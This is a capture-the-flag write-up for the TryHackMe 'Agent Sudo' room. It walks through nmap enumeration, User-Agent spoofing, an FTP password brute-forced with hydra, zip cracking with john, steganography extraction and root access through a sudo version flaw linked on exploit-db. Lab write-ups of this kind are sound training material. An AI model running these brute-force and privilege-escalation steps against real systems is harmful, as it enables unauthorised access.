agent sudo

General

This is a writeup of the room https://tryhackme.com/room/agentsudoctf.

Writeup

Enumeration

First an initial nmap scan,

$ nmap -sV -oN nmap.out <ip>

which shows ftp on port 21, ssh on port 22, and a webserver on port 80.

Accessing the website shows a message from Agent R, indicating that the User-Agent must be manipulated to access the site.

Setting the User-Agent: R via curl yields the following,

$ curl -A "R" 10.10.94.61
What are you doing! Are you one of the 25 employees? If not, I going to report this incident
<!DocType html>
<html>
<head>
	<title>Annoucement</title>
</head>

<body>
<p>
	Dear agents,
	<br><br>
	Use your own <b>codename</b> as user-agent to access the site.
	<br><br>
	From,<br>
	Agent R
</p>
</body>
</html>

which indicates all letters of the alphabet are used as identifiers for the different agents.

Iterating through the alphabet, one will find the name of the agent being asked for.

Hash cracking and brute-force

Anonymous FTP login was not possible, and guessing the intended username for the FTP service is possible from the enumeration part, hence the password must be brute-forced. In this case, hydra was used like so:

$ hydra -l <username> -P rockyou.txt <ip> ftp

Ultimately, this yields a password that can be used to login at the FTP service, and thereby list the following files:

$ ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Oct 29  2019 .
drwxr-xr-x    2 0        0            4096 Oct 29  2019 ..
-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png

To download all those files to analyze them locally, the following can be used:

wget -m ftp://<username>:<password>@<ip>

Moving on with binwalk to find embedded files and extracting those:

$ binwalk cutie.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

Extracting the zip archive:

$ binwalk -e cutie.png 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

The zip archive turns out to be password-protected. Here zip2john can be used:

$ zip2john 8702.zip > john.txt

The file john.txt is then passed on to john, yielding the password:

$ john --wordlist=/usr/share/wordlists/rockyou.txt john.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<password>            (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2024-02-10 18:27) 3.703g/s 91022p/s 91022c/s 91022C/s christal..280789
Use the "--show" option to display all of the cracked passwords reliably
Session completed

This allows us to unzip the archive, and we can then read To_agentR.txt. Utilizing https://gchq.github.io/CyberChef/ and its Magic functionality proposes what turns out to be the password needed for extracting the embedded content in the other image file, cute-alien.jpg.

For this, steghide can be used. First we try to get information on embedded data:

$ steghide info cute-alien.jpg 
"cute-alien.jpg":
  format: jpeg
  capacity: 1,8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "message.txt":
    size: 181,0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

It turns out that cute-alien.jpg contains a message.txt file. This is then extracted:

$ steghide extract -sf cute-alien.jpg 
Enter passphrase: 
wrote extracted data to "message.txt".

From the content of message.txt, we can derive the full name of the other agent and the SSH password.

Capture the user flag

Upon logging in via SSH, a file user_flag.txt is found together with an image file, Alien_autopsy.jpg. Some googling should get you the answer to the incident question.

Privilege escalation

So, the name of the CTF kind of hints at the attack vector already. Nevertheless, it is always nice to see what can be executed as root to begin with:

$ <username>@agent-sudo:~$ sudo -l
[sudo] password for <username>: 
Matching Defaults entries for <username> on agent-sudo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User <username> may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash

If we then see what version of sudo is running on the machine:

$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

Then we rather quickly find that the exploit found here https://www.exploit-db.com/exploits/47502 is suitable, and works perfectly fine to obtain root and answer the remaining questions.

PreviousTryHackMe Nextskynet

Last updated 1 year ago